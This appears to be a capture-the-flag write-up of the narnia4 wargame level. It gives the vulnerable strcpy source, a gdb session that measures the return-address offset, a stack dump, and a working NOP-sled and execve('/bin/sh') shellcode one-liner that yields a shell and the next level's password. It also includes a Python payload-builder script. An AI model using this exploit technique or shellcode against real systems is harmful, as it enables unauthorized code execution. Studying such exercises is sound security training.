The Narnia4 source is as follows:

/* This program is free software; you can redistribute it and/or modify it under the terms of
   the GNU General Public License as published by the Free Software Foundation; either version 2
   of the License, or (at your option) any later version.
   This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
   without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
   See the GNU General Public License for more details.
   You should have received a copy of the GNU General Public License along with this program;
   if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
   Boston, MA 02110-1301 USA */
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
    int i;
    char buffer[256];

    /* wipe every environment string in place */
    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    /* unbounded copy of argv[1] into a 256-byte stack buffer */
    if(argc>1)
        strcpy(buffer,argv[1]);

    return 0;
}
I honestly could not work out what that for loop is there for, because this level has nothing to do with it. The solution is the same as for narnia2: a NOP sled (NX is not enabled), so this is really just a review of narnia2. Still, keep in mind the 16-byte alignment issue mentioned before: the compiler pads the stack frame, so the saved return address does not sit immediately after the 256-byte buffer, and the real offset has to be measured rather than assumed. The debugging session is as follows:
narnia4@narnia:/narnia$ gdb -q narnia4
Reading symbols from narnia4...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "\x90"*256+"\x43\x43\x43\x43"')
Starting program: /narnia/narnia4 $(python -c 'print "\x90"*256+"\x43\x43\x43\x43"')
[Inferior 1 (process 25347) exited normally]
(gdb) r $(python -c 'print "\x90"*260+"\x43\x43\x43\x43"')
Starting program: /narnia/narnia4 $(python -c 'print "\x90"*260+"\x43\x43\x43\x43"')

Program received signal SIGSEGV, Segmentation fault.
0xf7e2a202 in __libc_start_main () from /lib32/libc.so.6
(gdb) r $(python -c 'print "\x90"*264+"\x43\x43\x43\x43"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia4 $(python -c 'print "\x90"*264+"\x43\x43\x43\x43"')

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb)
Sure enough, putting the jump address right after 256 bytes does not work: with 256 bytes the program exits normally, with 260 bytes the four 0x43 bytes clobber something else and the crash is inside __libc_start_main, and only at 264 bytes does EIP become 0x43434343. So 8 more bytes (frame padding plus the saved frame pointer) sit between the end of buffer and the return address, and the payload has to be 264 bytes plus the address. The jump address is found as follows:
(gdb) x/200x $esp
0xffffd5c0: 0x00000000 0xffffd654 0xffffd660 0x00000000
0xffffd5d0: 0x00000000 0x00000000 0xf7fc5000 0xf7ffdc0c
0xffffd5e0: 0xf7ffd000 0x00000000 0x00000002 0xf7fc5000
0xffffd5f0: 0x00000000 0x4d21e3f2 0x77ceefe2 0x00000000
0xffffd600: 0x00000000 0x00000000 0x00000002 0x080483b0
0xffffd610: 0x00000000 0xf7fee710 0xf7e2a199 0xf7ffd000
0xffffd620: 0x00000002 0x080483b0 0x00000000 0x080483d1
0xffffd630: 0x080484ab 0x00000002 0xffffd654 0x08048530
0xffffd640: 0x08048590 0xf7fe9070 0xffffd64c 0xf7ffd920
0xffffd650: 0x00000002 0xffffd785 0xffffd795 0x00000000
0xffffd660: 0xffffd8a2 0xffffd8b5 0xffffde71 0xffffdea8
0xffffd670: 0xffffdeb7 0xffffdec8 0xffffdedd 0xffffdeea
0xffffd680: 0xffffdef6 0xffffdeff 0xffffdf12 0xffffdf36
0xffffd690: 0xffffdf49 0xffffdf55 0xffffdf6c 0xffffdf7c
0xffffd6a0: 0xffffdf87 0xffffdf92 0xffffdf9a 0xffffdfaa
0xffffd6b0: 0x00000000 0x00000020 0xf7fd7c90 0x00000021
0xffffd6c0: 0xf7fd7000 0x00000010 0x178bfbff 0x00000006
0xffffd6d0: 0x00001000 0x00000011 0x00000064 0x00000003
0xffffd6e0: 0x08048034 0x00000004 0x00000020 0x00000005
0xffffd6f0: 0x00000008 0x00000007 0xf7fd9000 0x00000008
0xffffd700: 0x00000000 0x00000009 0x080483b0 0x0000000b
0xffffd710: 0x000036b4 0x0000000c 0x000036b4 0x0000000d
0xffffd720: 0x000036b4 0x0000000e 0x000036b4 0x00000017
0xffffd730: 0x00000001 0x00000019 0xffffd76b 0x0000001a
0xffffd740: 0x00000000 0x0000001f 0xffffdfe8 0x0000000f
0xffffd750: 0xffffd77b 0x00000000 0x00000000 0x00000000
0xffffd760: 0x00000000 0x00000000 0xc8000000 0x31785c54
0xffffd770: 0x1706d945 0xd327beb7 0x690e4282 0x00363836
0xffffd780: 0x00000000 0x616e2f00 0x61696e72 0x72616e2f
0xffffd790: 0x3461696e 0x90909000 0x90909090 0x90909090
0xffffd7a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd7b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd7c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd7d0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd7e0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd7f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd800: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd810: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd820: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd830: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd840: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd850: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd860: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd870: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd880: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd890: 0x90909090 0x90909090 0x90909090 0x43434390
0xffffd8a0: 0x00000043 0x00000000 0x00000000 0x00000000
0xffffd8b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd8c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd8d0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
Any address inside the run of 0x90 bytes will do (argv[1] starts at 0xffffd795 here, as the pointer at 0xffffd658 shows), preferably somewhere in the middle of the sled so that a small shift of the stack between gdb and a normal run still lands inside it. One thing to check: the address must not contain a 0x00 byte. strcpy stops at the first NUL, so the copy would be cut off at that byte and the return address would be overwritten only partially, sending execution somewhere else entirely. The final result:
narnia4@narnia:/narnia$ ./narnia4 $(python -c 'print "\x90"*226+"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"\x10\xd8\xff\xff"')
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy
$
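As an added example (not part of the original post), here is the payload construction above written as a Python 3 script instead of a one-liner. It uses the page's 38-byte shellcode, the 264-byte offset measured in gdb and the address 0xffffd810; the file name narnia4_payload.py and the helper names are assumptions. Besides assembling NOP sled + shellcode + little-endian address, it checks the two things that silently break this kind of exploit: that the shellcode still fits in front of the return address, and that no byte of the payload is 0x00, since strcpy stops there. pick_ret_addr aims at the middle of the sled and steps away from any address whose bytes contain a zero.

```python
import struct
import sys

# Shellcode from the page: execve("/bin/sh"), jmp/call/pop style, 38 bytes, no NUL bytes.
SHELLCODE = (
    b"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08"
    b"\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff"
    b"/bin/sh"
)

BUFFER_SIZE = 256   # char buffer[256] in narnia4
RET_OFFSET = 264    # measured in gdb: EIP became 0x43434343 with 264 bytes of padding


def first_nul(payload):
    """Offset of the first 0x00 byte, or -1 if there is none."""
    return payload.find(b"\x00")


def strcpy_view(payload):
    """What strcpy actually copies: everything up to (not including) the first NUL."""
    i = first_nul(payload)
    return payload if i < 0 else payload[:i]


def build_payload(ret_addr, ret_offset=RET_OFFSET, shellcode=SHELLCODE, check=True):
    """NOP sled + shellcode + little-endian return address.

    The sled is sized so that the shellcode ends exactly at ret_offset, i.e. the
    four address bytes land on the saved return address. With check=True a
    payload that strcpy would truncate (any NUL byte) is rejected.
    """
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode (%d bytes) does not fit before the return address"
                         % len(shellcode))
    sled = b"\x90" * (ret_offset - len(shellcode))
    payload = sled + shellcode + struct.pack("<I", ret_addr)
    nul = first_nul(payload)
    if check and nul >= 0:
        raise ValueError("payload has a NUL byte at offset %d; strcpy would stop there" % nul)
    return payload


def pick_ret_addr(sled_start, sled_len):
    """Choose a return address inside [sled_start, sled_start + sled_len).

    Starts at the middle of the sled (most tolerant to the stack moving a little
    between gdb and a normal run) and moves outwards until the packed address
    contains no 0x00 byte.
    """
    middle = sled_start + sled_len // 2
    for delta in range(sled_len // 2 + 1):
        for addr in (middle + delta, middle - delta):
            if sled_start <= addr < sled_start + sled_len:
                if first_nul(struct.pack("<I", addr)) < 0:
                    return addr
    raise ValueError("no NUL-free address inside the sled")


if __name__ == "__main__":
    # Usage (assumed file name):  ./narnia4 "$(python3 narnia4_payload.py)"
    # Raw bytes go to stdout so the shell passes them through unchanged.
    sys.stdout.buffer.write(build_payload(0xffffd810))
```

For a sled that starts at 0xffffd795 (argv[1] in the dump above) and is 226 bytes long, pick_ret_addr returns 0xffffd806; the author's 0xffffd810 is also inside that range. Passing 0xffffd800 instead is rejected, because its low byte is 0x00 and strcpy would copy only the first 264 bytes.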
Summary

I did not look at a walkthrough for this one. I suppose this is how it goes: read walkthroughs first and eventually you form your own way of thinking. Whether I can still work it out when I run into other kinds of challenges later, I do not know.

Attached are the executable and the source code.

The shellcode linked in this post is from the earlier side post.

Last edited 20 hours ago by pureGavin; reason: typo.